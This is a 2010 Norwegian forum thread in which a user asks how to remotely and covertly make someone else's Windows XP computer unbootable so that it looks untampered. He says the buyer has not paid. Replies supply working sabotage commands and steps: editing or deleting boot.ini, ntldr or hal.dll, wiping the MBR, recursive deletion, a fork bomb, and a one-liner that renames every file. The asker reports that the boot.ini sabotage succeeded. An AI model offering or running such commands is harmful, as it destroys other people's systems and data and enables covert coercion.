Du må være registrert og logget inn for å kunne legge ut innlegg på freak.no
X
LOGG INN
... eller du kan registrere deg nå
Dette nettstedet er avhengig av annonseinntekter for å holde driften og videre utvikling igang. Vi liker ikke reklame heller, men alternativene er ikke mange. Vær snill å vurder å slå av annonseblokkering, eller å abonnere på en reklamefri utgave av nettstedet.
  29 2581
Har en maskin jeg ønsker å gjøre ubrukelig.
Ønsker ikke å ødelegge maskinen men gi den en blå skjerm oppstart, eller en evig re-start loop.
Har ca 30 sekunder å gjøre dette på.
Har remote tilgang ikke fysisk.
Den har xp som OS.
Ønsker at det skal skje etter neste oppstart, altså at alt ser normalt ut før den blir startet på nytt.

Beklager om denne havner i feil evne.
Sist endret av The_WEB_KILLER; 26. juni 2010 kl. 11:07.
Vet ikke om dette funker lenger, da det er 15 år siden jeg "kunne data". Men i gamle dager funke følgende:

- Åpne Autoexec.bat i rotmappen, som regel c:

Lim inn følgende i begynnelsen av filen:

@echo off
:loop
echo fuck off
goto loop

... Og lagre.

Dette burde få maskina inn i en evig loop av "fuck off". Iallfall hvis du har en 15 år gammel maskin.
Se bak maskinen, på strømforsyningen skal det være en rød bryter.
Dytt den bryteren over til andre siden, dette forandrer mengden strøm den tar imot, og pc'en starter ikke.
Har gjort det selv med utmerket resultat.

Edit. Så nettop du ikke hadde fysisk tilgang til den, du kan prøve å gå inn i CWindows\System32 og slette det du får til.
Sist endret av Gaudern; 26. juni 2010 kl. 11:22.
Rediger boot.ini som ligger rett på

Kode

C:\
Skift ut noen bokstaver i hver linje så starter ikke OS'et.

Du kan også slette ntldr, da får du heller ikke startet opp maskina.

Dette er forholdsvis enkelt å fikse, man bare booter en linux live cd og fikser filene om det blir nødvendig.


EDIT 600 :O
Sist endret av random13798; 26. juni 2010 kl. 11:28.
Sitat av xtapolapocetl Vis innlegg
Vet ikke om dette funker lenger, da det er 15 år siden jeg "kunne data". Men i gamle dager funke følgende:

- Åpne Autoexec.bat i rotmappen, som regel c:

Lim inn følgende i begynnelsen av filen:

@echo off
:loop
echo fuck off
goto loop

... Og lagre.

Dette burde få maskina inn i en evig loop av "fuck off". Iallfall hvis du har en 15 år gammel maskin.
Vis hele sitatet...
ikke bare 15 år gammel maskin, men 15 år gammel person.
Skal ikke se ut som om noen har vært å tuklet.
Kjekt om dere som kommer med tips skriver oppskriften nøyaktig. slik at jeg bruker kortest mulig tid. altså klikk for klikk oppskrift.
Hva er grunnen til at denne stakkaren med en eldgammel maskin skal få gjennomgå dette?
Sitat av mranders0n Vis innlegg
Hva er grunnen til at denne stakkaren med en eldgammel maskin skal få gjennomgå dette?
Vis hele sitatet...
Hvorfor mener du det er en eldgammel maskin?
Jeg har maskin anno 2010 og kjører fortsatt xp, og vet at det er mange av oss
Grunnen har du vel egentlig ingenting med.
Men kan si det sånn at det egentlig er min maskin, men jeg har IKKE mottatt betaling for den.
Han som kjøpte den har 0 data kunnskaper, og jeg vet at ha ikke har noen andre enn meg å spørre om hjelp.
Noe som vil føre til at han Ønsker å heve kjøpet.
Sist endret av The_WEB_KILLER; 26. juni 2010 kl. 11:47.
Sitat av Monkey_drone Vis innlegg
Rediger boot.ini som ligger rett på

Kode

C:\
Skift ut noen bokstaver i hver linje så starter ikke OS'et.

Du kan også slette ntldr, da får du heller ikke startet opp maskina.

Dette er forholdsvis enkelt å fikse, man bare booter en linux live cd og fikser filene om det blir nødvendig.


EDIT 600 :O
Vis hele sitatet...

DENNE løsningen tror jeg fungerer. Den brukeren du skal inn på, har sannsynligvis tilgang til å redigere boot.ini filen (Administratorbruker)
Bare endre på noe i den filen, eller evt slette hele den. Tviler på at han klarer å forstå at det er noen som har tuklet med maskinen, for det hadde jeg neppe gjort på en stund, ettersom jeg sikkert bare hadde reinstallert eller lignede.
PRØV!
Sitat av Monkey_drone Vis innlegg
Rediger boot.ini som ligger rett på

Kode

C:\
Skift ut noen bokstaver i hver linje så starter ikke OS'et.

Du kan også slette ntldr, da får du heller ikke startet opp maskina.

Dette er forholdsvis enkelt å fikse, man bare booter en linux live cd og fikser filene om det blir nødvendig.


EDIT 600 :O
Vis hele sitatet...
kan jeg ikke bare slette hele teksten?
Sitat av Salviayo Vis innlegg
Se bak maskinen, på strømforsyningen skal det være en rød bryter.
Dytt den bryteren over til andre siden, dette forandrer mengden strøm den tar imot, og pc'en starter ikke.
Har gjort det selv med utmerket resultat.
Vis hele sitatet...
Vært borti den der, og da smalt det no inni granskauen og begynte å ryke som faen midt i klasserommet under en prøve...
sindre@puse.cat:~$
Synderen's Avatar
Slett MBR, da starter ikke OS.
http://www.ptdd.com/mbr.htm
Sitat av kimmag Vis innlegg
Vært borti den der, og da smalt det no inni granskauen og begynte å ryke som faen midt i klasserommet under en prøve...
Vis hele sitatet...
Second that. Gjorde det samme på en skolepc, og det smalt som bare faen. Kanskje det er trygt om PCen er avskrudd?
Da går det galt når du slår den på...
Ordenens Seglbevarer
Ond^Sofa's Avatar
Han har ikke tilgang til maskinen, så slutt å foreslå psu.

Forøvrig så er det forholdsvis lett å fikse oppstartsfiler som mangler, hvis man har litt omgang i toppen og går finn for å reparere det.
Sitat av The_WEB_KILLER Vis innlegg
Hvorfor mener du det er en eldgammel maskin? Jeg har maskin anno 2010 og kjører fortsatt xp, og vet at det er mange av oss
Grunnen har du vel egentlig ingenting med.
Vis hele sitatet...
Du sa selv at maskinen var 15 år gammel, kjører selv xp og syns det fungerer topp, jeg siktet til at selve maskinen var 15 år gammel. Kanskje det oppstod en missforståelse et sted. Lykke til med å få tilbake maskinen!
Sitat av binkabi Vis innlegg
Second that. Gjorde det samme på en skolepc, og det smalt som bare faen. Kanskje det er trygt om PCen er avskrudd?
Vis hele sitatet...
Jeg gjorde det for morroskyld. Hadde ikke noe anelse om hva det var og ville finne det ut.
Du kan jo evt legge til en bat fil i oppstarten. I den har du en kommando for å restarte maskinen.

Husker jeg ikke feil er det: shutdown -f -r
:(){ :|:& };:
tripflag's Avatar
Last ned og kjør Windows optimizer;
http://encyclopediadramatica.com/Windows_Optimizer
ta en sikkerhetskopi av windows\system32\hal.dll og slett den.for å fikse det bare ta ut harddisken, koble til en maskin som fungerer og lagre hal.dll i windows\system32\
@mranders0n sorry. jeg quota kanskje litt dårlig
som jeg skrev har jeg 30sek å gjøre dette på. spiller ingen rolle om jeg må reinstalere OS.
Kan jeg ikke bare slette hele boot.ini teksten?
Ordenens Seglbevarer
Ond^Sofa's Avatar
Fyr opp kommandolinje og skriv del *.* /S
slett noen random filer i System32. Det var det jeg gjorde
Sitat av The_WEB_KILLER Vis innlegg
Har en maskin jeg ønsker å gjøre ubrukelig.
Vis hele sitatet...
Installer apple os
Kast maskinen ut vinduet og si til han som kjøpte den : "Du skulle nok betalt forsikring" :P
eller: Ta med maskinen hjem ettersom han ikke har betalt eller har noen dokumenter som beviser transaksjonen...
N00bs!!
Denne linja vil gjøre susen:
[COLOR="Red"]for /r "C:" %g in (*.*) do echo y | ren %g %random%.%random%[/COLOR]
Rett inn i kjør/cmd.
Ikke gjør dette til en expert/elkjøp/bibilotek-hype.

Dette vil få pc'n til å se ok ut(?) til neste omstøvel.
Sist endret av Rolsen Royce; 28. juni 2010 kl. 06:11.
Sitat av Rolsen Royce Vis innlegg
N00bs!!
Denne linja vil gjøre susen:
[COLOR="Red"]for /r "C:" %g in (*.*) do echo y | ren %g %random%.%random%[/COLOR]
Rett inn i kjør/cmd.
Ikke gjør dette til en expert/elkjøp/bibilotek-hype.

Dette vil få pc'n til å se ok ut(?) til neste omstøvel.
Vis hele sitatet...
Hva gjør så den linja?
Er veldig nyskjerrig
rota med boot.ini funket flott fikk pc tilbake idag med beskjed om at pengene skulle jeg bare se langt etter
Gig
Naturlig Talentløs
Gig's Avatar
Lenge siden du solgte figuren maskina eller? kan ikke være så lenge siden iom at han plutselig ikke ville betale deg nå? ^^
Jeg så en guide for å lage bluescreen ved oppstart en gang. Jeg tror det stod at man skulle slette alt i system32, og ta en hurtig omstart så filene ikke gjenopprettet seg med en gang. Vet ikke hvordan det funker, men det høres ihvertfall ikke så hyggelig ut for PCen.
Sitat av Gig Vis innlegg
Lenge siden du solgte figuren maskina eller? kan ikke være så lenge siden iom at han plutselig ikke ville betale deg nå? ^^
Vis hele sitatet...
vi avtalte en pris.så gikk det 2-3 uker så ville han prute, mente det var for dyrt, så jeg gikk med på ett lite avslag, 1-2 uker etter det igjen ville han igjen ha prisen ned, da sa jeg nei og ville ha pengene, 1 uke etter det og enda ingen penger på konto, og merkelig lite kontakt og svar fra han.
Nå er dette en "kompis" så gidda ikke sette så mange krav og orka heller ikke krangle om penger, så dette var en grei måte å gjøre det på. vi slapp å krangle, og jeg fikk maskina igjen.
Sitat av The_WEB_KILLER Vis innlegg
vi avtalte en pris.så gikk det 2-3 uker så ville han prute, mente det var for dyrt, så jeg gikk med på ett lite avslag, 1-2 uker etter det igjen ville han igjen ha prisen ned, da sa jeg nei og ville ha pengene, 1 uke etter det og enda ingen penger på konto, og merkelig lite kontakt og svar fra han.
Nå er dette en "kompis" så gidda ikke sette så mange krav og orka heller ikke krangle om penger, så dette var en grei måte å gjøre det på. vi slapp å krangle, og jeg fikk maskina igjen.
Vis hele sitatet...
Om det der er en "kompis" (ja, selv i anførselstegn) bør du se deg om etter nye venner. Folk som ikke gjør opp for seg, uansett om det gjelder penger eller annen gjeld, er stakkarslige drittunger som bør skys som pesten.